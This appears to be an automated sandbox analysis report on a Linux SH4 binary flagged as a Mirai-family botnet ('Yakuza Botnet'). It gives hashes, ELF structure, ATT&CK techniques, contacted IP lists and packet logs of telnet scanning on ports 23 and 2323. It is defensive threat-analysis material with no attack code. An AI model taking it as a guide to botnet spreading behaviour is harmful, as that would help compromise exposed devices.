Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39276
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37636
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37670
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37696
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37718
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37754
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37786
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37818
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37844
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 37874
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39308
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39938
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39972
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 39998
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40022
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40040
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40064
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40096
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40120
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40152
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40176
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40198
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40218
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40234
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40256
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40280
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40300
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40330
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 40360

Source: /tmp/TudQawdlbF (PID: 5209)

Queries kernel information via 'uname':

Source: TudQawdlbF, 5209.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmp, TudQawdlbF, 5213.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: TudQawdlbF, 5209.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmp, TudQawdlbF, 5213.1.00000000a254d34e.00000000fae0ca1c.rw-.sdmp	Binary or memory string: V7x86_64/usr/bin/qemu-sh4/tmp/TudQawdlbFSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/TudQawdlbF
Source: TudQawdlbF, 5209.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmp, TudQawdlbF, 5213.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmp	Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: TudQawdlbF, 5209.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmp, TudQawdlbF, 5213.1.00000000cdce54b6.00000000f6dafd62.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4

Stealing of Sensitive Information:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Remote Access Functionality:

Yara detected Mirai

Show sources

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	File Deletion1	OS Credential Dumping	Security Software Discovery11	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TudQawdlbF	44%	Virustotal		Browse
TudQawdlbF	40%	Metadefender		Browse
TudQawdlbF	56%	ReversingLabs	Linux.Trojan.Mirai

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
144.11.242.71	unknown	United States	58541	CHINATELECOM-SHANDONG-QINGDAO-IDCQingdao266000CN	false
82.125.79.153	unknown	France	3215	FranceTelecom-OrangeFR	false
98.34.189.138	unknown	United States	7922	COMCAST-7922US	false
182.28.200.252	unknown	Indonesia	4795	INDOSATM2-IDINDOSATM2ASNID	false
191.2.105.207	unknown	Brazil	7738	TelemarNorteLesteSABR	false
165.241.54.131	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
151.211.116.212	unknown	United Kingdom	11003	PANDGUS	false
76.29.27.180	unknown	United States	7922	COMCAST-7922US	false
180.172.248.165	unknown	China	4812	CHINANET-SH-APChinaTelecomGroupCN	false
39.110.118.152	unknown	Japan	2527	SO-NETSo-netEntertainmentCorporationJP	false
101.234.204.115	unknown	Australia	45577	INTERVOLVE-MELBOURNE-AS-APIntervolvePtyLtdAU	false
64.57.156.131	unknown	United States	18659	FTPS-LLCUS	false
184.223.162.13	unknown	United States	10507	SPCSUS	false
151.157.25.132	unknown	Norway	224	UNINETTUNINETTTheNorwegianUniversityResearchNetwork	false
204.36.210.23	unknown	United States	721	DNIC-ASBLK-00721-00726US	false
124.31.210.124	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
38.112.246.25	unknown	United States	174	COGENT-174US	false
79.37.106.122	unknown	Italy	3269	ASN-IBSNAZIT	false
208.196.44.36	unknown	United States	701	UUNETUS	false
147.252.193.92	unknown	Ireland	1213	HEANETIE	false
91.205.183.104	unknown	Russian Federation	51811	LOKOBANK-ASRU	false
80.117.234.117	unknown	Italy	3269	ASN-IBSNAZIT	false
66.147.120.248	unknown	United States	7029	WINDSTREAMUS	false
89.203.245.219	unknown	Czech Republic	25512	CDT-ASTheCzechRepublicCZ	false
132.174.108.236	unknown	United States	4373	OCLC-ASUS	false
156.114.21.35	unknown	Netherlands	13639	ING-AMERICAS-WHOLESALEUS	false
25.19.39.29	unknown	United Kingdom	7922	COMCAST-7922US	false
150.109.138.209	unknown	Singapore	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	false
171.194.174.175	unknown	United States	10794	BANKAMERICAUS	false
142.34.24.20	unknown	Canada	27272	Q9-AS-CAL3CA	false
124.220.114.107	unknown	China	45361	JCN-AS-KRUlsanJung-AngBroadcastingNetworkKR	false
178.121.106.240	unknown	Belarus	6697	BELPAK-ASBELPAKBY	false
114.209.227.52	unknown	China	9595	XEPHIONNTT-MECorporationJP	false
12.46.36.249	unknown	United States	2386	INS-ASUS	false
86.17.1.166	unknown	United Kingdom	5089	NTLGB	false
201.77.56.69	unknown	Brazil	28583	RuralWebTelecomunicacoesLtdaBR	false
78.64.30.126	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	false
146.15.235.165	unknown	United States	1467	DNIC-ASBLK-01467-01468US	false
187.136.222.94	unknown	Mexico	8151	UninetSAdeCVMX	false
191.157.233.183	unknown	Colombia	26611	COMCELSACO	false
159.95.161.30	unknown	France	20617	BNP-PARIBASGB	false
94.66.233.221	unknown	Greece	6799	OTENET-GRAthens-GreeceGR	false
184.132.54.134	unknown	United States	5778	CENTURYLINK-LEGACY-EMBARQ-RCMTUS	false
99.220.55.165	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
47.22.179.99	unknown	United States	6128	CABLE-NET-1US	false
130.99.153.128	unknown	United States	203	CENTURYLINK-LEGACY-LVLT-203US	false
119.68.28.235	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
213.58.107.86	unknown	Portugal	9186	ONILisbonPortugalPT	false
12.213.2.200	unknown	United States	7018	ATT-INTERNET4US	false
167.185.202.205	unknown	United States	15071	BAX-BGPUS	false
19.214.208.55	unknown	United States	3	MIT-GATEWAYSUS	false
83.92.253.152	unknown	Denmark	3292	TDCTDCASDK	false
136.23.81.170	unknown	United States	394699	GOOGLE-ACCESS-NYCUS	false
188.247.2.168	unknown	Syrian Arab Republic	29256	INT-PDN-STE-ASSTEPDNInternalASSY	false
80.170.65.237	unknown	Sweden	1257	TELE2EU	false
103.244.180.104	unknown	New Zealand	132509	DAHL-AS-APDIGIWEBADVANCEDHOSTINGLIMITEDNZ	false
78.157.213.16	unknown	United Kingdom	42831	UKSERVERS-ASUKDedicatedServersHostingandCo-Location	false
59.178.147.154	unknown	India	17813	MTNL-APMahanagarTelephoneNigamLimitedIN	false
8.155.218.254	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
186.253.253.44	unknown	Brazil	26615	TIMSABR	false
182.23.50.158	unknown	Indonesia	4800	LINTASARTA-AS-APNetworkAccessProviderandInternetServic	false
141.250.36.79	unknown	Italy	137	ASGARRConsortiumGARREU	false
164.120.132.110	unknown	United States	14235	STATE-NM-US	false
53.84.31.42	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
24.50.201.17	unknown	United States	14638	LCPRLUS	false
45.231.45.87	unknown	Mexico	265546	HYUNDAIAUTOEVERMEXICOSDERLDECVMX	false
176.85.20.199	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
82.197.221.42	unknown	Netherlands	25596	CAMBRIUM-ASNL	false
151.71.40.99	unknown	Italy	1267	ASN-WINDTREIUNETEU	false
104.210.176.30	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
220.8.84.129	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
116.167.148.230	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
93.182.85.162	unknown	Turkey	44558	NETONLINETR	false
197.193.244.10	unknown	Egypt	36992	ETISALAT-MISREG	false
177.250.111.177	unknown	Paraguay	27866	COPACOPY	false
96.9.165.193	unknown	Singapore	134809	VIEWQWEST-AS-APViewQwestSdnBhdMY	false
152.97.244.234	unknown	United States	21766	BEN-LOMAND-TELUS	false
199.33.239.34	unknown	United States	32992	ITECHTOOL-ASN-SFUS	false
171.225.54.141	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	false
117.115.137.151	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
120.96.248.252	unknown	Taiwan; Republic of China (ROC)	17716	NTU-TWNationalTaiwanUniversityTW	false
75.184.18.44	unknown	United States	11426	TWC-11426-CAROLINASUS	false
96.102.162.17	unknown	United States	7922	COMCAST-7922US	false
80.198.91.106	unknown	Denmark	3292	TDCTDCASDK	false
71.235.175.151	unknown	United States	7922	COMCAST-7922US	false
62.39.174.138	unknown	France	15557	LDCOMNETFR	false
110.102.74.199	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
12.238.112.34	unknown	United States	11085	PDI-HQ-INETUS	false
50.225.232.150	unknown	United States	7922	COMCAST-7922US	false
194.10.160.193	unknown	European Union	2686	ATGS-MMD-ASUS	false
96.63.51.106	unknown	Canada	22995	BARR-XPLR-ASNCA	false
196.111.216.211	unknown	Kenya	33771	SAFARICOM-LIMITEDKE	false
125.171.111.165	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
72.86.238.183	unknown	United States	701	UUNETUS	false
38.170.192.133	unknown	United States	174	COGENT-174US	false
112.93.165.94	unknown	China	17816	CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi	false
130.84.114.72	unknown	France	1303	FR-IDRIS-ORSAYFREU	false
117.184.54.129	unknown	China	9808	CMNET-GDGuangdongMobileCommunicationCoLtdCN	false
193.119.122.244	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	false
17.84.31.213	unknown	United States	714	APPLE-ENGINEERINGUS	false

Runtime Messages

Command:	/tmp/TudQawdlbF
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Yakuza Botnet
Standard Error:

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.801600272167886
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	TudQawdlbF
File size:	55112
MD5:	c334e7bb5fe6853b0654ef0207106832
SHA1:	8e214ec8b0e9b3725a5f0dbf0c70a391ca044bb3
SHA256:	f4b66f5bfca612afe7d4d0d430511fedbc247eb91ab65c99c5ae7524a4af4e1b
SHA512:	fa105827e12211609109a9d28e31346f3955cffcea0d1ef40c62f7e2ba572309c3c67c92740fed2c46e4a19f9e22436dae5e615f6645c4805a18285a864ee0f8
SSDEEP:	768:OavUjkefqoege3ePecCiB29tVasevR586k9HCRRvoVimXQkC9o5W1Up:Oav8kWp9+OiumtMlpqFHKAVrQkC9onp
File Content Preview:	.ELF.....................@.4...........4. ...(...............@...@...........................A...A......'..........Q.td............................././"O.n........#.@........#.*@,....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	54712
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x30	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0xc440	0x0	0x6	AX	32
.fini	PROGBITS	0x40c520	0xc520	0x24	0x0	0x6	AX	4
.rodata	PROGBITS	0x40c544	0xc544	0xc78	0x0	0x2	A	4
.ctors	PROGBITS	0x41d1c0	0xd1c0	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x41d1c8	0xd1c8	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x41d1d4	0xd1d4	0x3a4	0x0	0x3	WA	4
.bss	NOBITS	0x41d578	0xd578	0x23d4	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0xd578	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0xd1bc	0xd1bc	4.4933	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0xd1c0	0x41d1c0	0x41d1c0	0x3b8	0x278c	1.5889	0x6	RW	0x10000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2022 13:54:36.831069946 CET	50877	2323	192.168.2.23	141.86.198.69
Jan 14, 2022 13:54:36.831144094 CET	50877	23	192.168.2.23	149.187.171.69
Jan 14, 2022 13:54:36.831173897 CET	50877	23	192.168.2.23	88.189.224.68
Jan 14, 2022 13:54:36.831172943 CET	50877	23	192.168.2.23	93.241.141.26
Jan 14, 2022 13:54:36.831192017 CET	50877	23	192.168.2.23	220.80.143.59
Jan 14, 2022 13:54:36.831207037 CET	50877	23	192.168.2.23	82.154.133.222
Jan 14, 2022 13:54:36.831217051 CET	50877	23	192.168.2.23	146.29.155.107
Jan 14, 2022 13:54:36.831228971 CET	50877	23	192.168.2.23	133.58.95.237
Jan 14, 2022 13:54:36.831235886 CET	50877	23	192.168.2.23	108.60.195.1
Jan 14, 2022 13:54:36.831242085 CET	50877	23	192.168.2.23	9.209.69.154
Jan 14, 2022 13:54:36.831248999 CET	50877	2323	192.168.2.23	36.210.180.3
Jan 14, 2022 13:54:36.831259012 CET	50877	23	192.168.2.23	82.249.97.174
Jan 14, 2022 13:54:36.831280947 CET	50877	23	192.168.2.23	50.202.185.87
Jan 14, 2022 13:54:36.831310987 CET	50877	23	192.168.2.23	75.83.111.138
Jan 14, 2022 13:54:36.831321955 CET	50877	23	192.168.2.23	43.224.41.107
Jan 14, 2022 13:54:36.831336021 CET	50877	23	192.168.2.23	216.217.0.41
Jan 14, 2022 13:54:36.831387043 CET	50877	23	192.168.2.23	172.188.106.136
Jan 14, 2022 13:54:36.831402063 CET	50877	23	192.168.2.23	178.106.141.236
Jan 14, 2022 13:54:36.831413031 CET	50877	23	192.168.2.23	53.80.128.113
Jan 14, 2022 13:54:36.831413984 CET	50877	23	192.168.2.23	98.216.11.125
Jan 14, 2022 13:54:36.831423044 CET	50877	2323	192.168.2.23	121.35.234.62
Jan 14, 2022 13:54:36.831433058 CET	50877	23	192.168.2.23	101.207.243.236
Jan 14, 2022 13:54:36.831438065 CET	50877	23	192.168.2.23	8.253.93.142
Jan 14, 2022 13:54:36.831440926 CET	50877	23	192.168.2.23	208.44.174.245
Jan 14, 2022 13:54:36.831460953 CET	50877	23	192.168.2.23	174.106.85.149
Jan 14, 2022 13:54:36.831466913 CET	50877	23	192.168.2.23	58.185.186.163
Jan 14, 2022 13:54:36.831473112 CET	50877	23	192.168.2.23	101.166.89.67
Jan 14, 2022 13:54:36.831489086 CET	50877	23	192.168.2.23	144.93.192.164
Jan 14, 2022 13:54:36.831495047 CET	50877	23	192.168.2.23	77.73.19.234
Jan 14, 2022 13:54:36.831500053 CET	50877	23	192.168.2.23	216.170.182.69
Jan 14, 2022 13:54:36.831517935 CET	50877	23	192.168.2.23	69.36.195.1
Jan 14, 2022 13:54:36.831517935 CET	50877	2323	192.168.2.23	102.64.118.166
Jan 14, 2022 13:54:36.831528902 CET	50877	23	192.168.2.23	91.198.168.1
Jan 14, 2022 13:54:36.831537962 CET	50877	23	192.168.2.23	164.75.44.95
Jan 14, 2022 13:54:36.831538916 CET	50877	23	192.168.2.23	167.60.38.113
Jan 14, 2022 13:54:36.831547976 CET	50877	23	192.168.2.23	83.44.153.70
Jan 14, 2022 13:54:36.831548929 CET	50877	23	192.168.2.23	213.4.146.237
Jan 14, 2022 13:54:36.831589937 CET	50877	23	192.168.2.23	51.204.223.48
Jan 14, 2022 13:54:36.831599951 CET	50877	2323	192.168.2.23	24.99.45.174
Jan 14, 2022 13:54:36.831619978 CET	50877	23	192.168.2.23	171.119.75.215
Jan 14, 2022 13:54:36.831624985 CET	50877	23	192.168.2.23	140.51.210.85
Jan 14, 2022 13:54:36.831654072 CET	50877	23	192.168.2.23	150.243.17.14
Jan 14, 2022 13:54:36.831655025 CET	50877	23	192.168.2.23	71.177.246.80
Jan 14, 2022 13:54:36.831655979 CET	50877	23	192.168.2.23	169.143.83.110
Jan 14, 2022 13:54:36.831666946 CET	50877	23	192.168.2.23	50.135.255.135
Jan 14, 2022 13:54:36.831671000 CET	50877	23	192.168.2.23	162.100.4.89
Jan 14, 2022 13:54:36.831680059 CET	50877	23	192.168.2.23	168.107.21.245
Jan 14, 2022 13:54:36.831712961 CET	50877	2323	192.168.2.23	100.37.150.96
Jan 14, 2022 13:54:36.831727982 CET	50877	23	192.168.2.23	47.81.35.34
Jan 14, 2022 13:54:36.831732988 CET	50877	23	192.168.2.23	176.59.139.15
Jan 14, 2022 13:54:36.831737041 CET	50877	23	192.168.2.23	77.94.12.49
Jan 14, 2022 13:54:36.831739902 CET	50877	23	192.168.2.23	213.245.144.200
Jan 14, 2022 13:54:36.831747055 CET	50877	23	192.168.2.23	200.145.67.145
Jan 14, 2022 13:54:36.831758976 CET	50877	23	192.168.2.23	65.0.146.157
Jan 14, 2022 13:54:36.831758976 CET	50877	23	192.168.2.23	152.66.108.245
Jan 14, 2022 13:54:36.831762075 CET	50877	23	192.168.2.23	116.179.4.120
Jan 14, 2022 13:54:36.831763029 CET	50877	23	192.168.2.23	172.48.159.65
Jan 14, 2022 13:54:36.831768036 CET	50877	23	192.168.2.23	2.141.203.124
Jan 14, 2022 13:54:36.831774950 CET	50877	23	192.168.2.23	180.44.1.133
Jan 14, 2022 13:54:36.831785917 CET	50877	23	192.168.2.23	52.143.0.109
Jan 14, 2022 13:54:36.831789970 CET	50877	2323	192.168.2.23	159.129.48.36
Jan 14, 2022 13:54:36.831804991 CET	50877	23	192.168.2.23	180.169.186.142
Jan 14, 2022 13:54:36.831825018 CET	50877	23	192.168.2.23	24.64.112.69
Jan 14, 2022 13:54:36.831830978 CET	50877	23	192.168.2.23	162.236.200.236
Jan 14, 2022 13:54:36.831831932 CET	50877	23	192.168.2.23	204.43.220.174
Jan 14, 2022 13:54:36.831841946 CET	50877	23	192.168.2.23	162.54.88.208
Jan 14, 2022 13:54:36.831911087 CET	50877	23	192.168.2.23	221.43.222.231
Jan 14, 2022 13:54:36.831912041 CET	50877	23	192.168.2.23	107.19.7.137
Jan 14, 2022 13:54:36.831948042 CET	50877	23	192.168.2.23	117.19.93.162
Jan 14, 2022 13:54:36.831953049 CET	50877	23	192.168.2.23	116.121.56.168
Jan 14, 2022 13:54:36.831955910 CET	50877	23	192.168.2.23	154.27.17.16
Jan 14, 2022 13:54:36.831963062 CET	50877	23	192.168.2.23	98.235.243.6
Jan 14, 2022 13:54:36.831965923 CET	50877	23	192.168.2.23	111.168.223.146
Jan 14, 2022 13:54:36.831969976 CET	50877	23	192.168.2.23	143.21.172.222
Jan 14, 2022 13:54:36.831969976 CET	50877	23	192.168.2.23	41.134.117.17
Jan 14, 2022 13:54:36.831973076 CET	50877	23	192.168.2.23	136.205.127.228
Jan 14, 2022 13:54:36.831976891 CET	50877	2323	192.168.2.23	141.94.194.77
Jan 14, 2022 13:54:36.832011938 CET	50877	23	192.168.2.23	90.24.111.205
Jan 14, 2022 13:54:36.832020998 CET	50877	23	192.168.2.23	69.209.104.249
Jan 14, 2022 13:54:36.832024097 CET	50877	23	192.168.2.23	36.39.168.214
Jan 14, 2022 13:54:36.832168102 CET	50877	23	192.168.2.23	192.255.3.175
Jan 14, 2022 13:54:36.832170963 CET	50877	23	192.168.2.23	91.27.110.96
Jan 14, 2022 13:54:36.832170963 CET	50877	2323	192.168.2.23	184.9.48.143
Jan 14, 2022 13:54:36.832173109 CET	50877	23	192.168.2.23	85.36.235.194
Jan 14, 2022 13:54:36.832180977 CET	50877	23	192.168.2.23	87.50.184.30
Jan 14, 2022 13:54:36.832187891 CET	50877	23	192.168.2.23	72.238.243.168
Jan 14, 2022 13:54:36.832195044 CET	50877	23	192.168.2.23	173.17.5.155
Jan 14, 2022 13:54:36.832201958 CET	50877	23	192.168.2.23	23.202.215.28
Jan 14, 2022 13:54:36.832209110 CET	50877	23	192.168.2.23	186.198.243.165
Jan 14, 2022 13:54:36.832214117 CET	50877	23	192.168.2.23	44.87.204.208
Jan 14, 2022 13:54:36.832216978 CET	50877	23	192.168.2.23	135.96.109.47
Jan 14, 2022 13:54:36.832220078 CET	50877	23	192.168.2.23	141.165.189.134
Jan 14, 2022 13:54:36.832221985 CET	50877	23	192.168.2.23	8.237.95.28
Jan 14, 2022 13:54:36.832222939 CET	50877	23	192.168.2.23	181.44.175.75
Jan 14, 2022 13:54:36.832225084 CET	50877	23	192.168.2.23	155.242.135.228
Jan 14, 2022 13:54:36.832225084 CET	50877	23	192.168.2.23	191.55.84.185
Jan 14, 2022 13:54:36.832231045 CET	50877	23	192.168.2.23	182.1.241.155
Jan 14, 2022 13:54:36.832233906 CET	50877	23	192.168.2.23	101.177.164.170
Jan 14, 2022 13:54:36.832237005 CET	50877	2323	192.168.2.23	184.217.185.95
Jan 14, 2022 13:54:36.832242012 CET	50877	23	192.168.2.23	86.42.230.244

System Behavior

Analysis Process: TudQawdlbF PID: 5209 Parent PID: 5106

General

Start time:	13:54:35
Start date:	14/01/2022
Path:	/tmp/TudQawdlbF
Arguments:	/tmp/TudQawdlbF
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: TudQawdlbF PID: 5211 Parent PID: 5209

General

Start time:	13:54:35
Start date:	14/01/2022
Path:	/tmp/TudQawdlbF
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: TudQawdlbF PID: 5213 Parent PID: 5211

General

Start time:	13:54:35
Start date:	14/01/2022
Path:	/tmp/TudQawdlbF
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: TudQawdlbF PID: 5214 Parent PID: 5211

General

Start time:	13:54:35
Start date:	14/01/2022
Path:	/tmp/TudQawdlbF
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: TudQawdlbF PID: 5216 Parent PID: 5211

General

Start time:	13:54:35
Start date:	14/01/2022
Path:	/tmp/TudQawdlbF
Arguments:	n/a
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Analysis Process: dash PID: 5258 Parent PID: 4331

General

Start time:	13:55:59
Start date:	14/01/2022
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Analysis Process: rm PID: 5258 Parent PID: 4331

General

Start time:	13:55:59
Start date:	14/01/2022
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.XirojNzOMl /tmp/tmp.CnxdzwO3rm /tmp/tmp.iXnCqWUK00
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report TudQawdlbF

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

PCAP (Network Traffic)

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

